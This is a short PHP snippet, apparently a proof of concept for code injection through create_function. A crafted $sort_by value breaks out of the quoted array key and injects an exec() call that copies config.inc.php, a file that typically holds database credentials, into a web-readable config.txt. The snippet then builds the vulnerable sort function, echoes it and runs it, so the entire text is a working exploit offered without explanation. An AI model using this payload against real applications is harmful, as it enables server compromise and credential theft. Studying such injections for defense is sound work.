<? $sort_by='"]) || exec(\'cp $(pwd)"/config.inc.php" config.txt\'); //'; $sort_order='desc'; $sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); '; echo $sort_function; create_function('$a, $b', $sort_function) ?>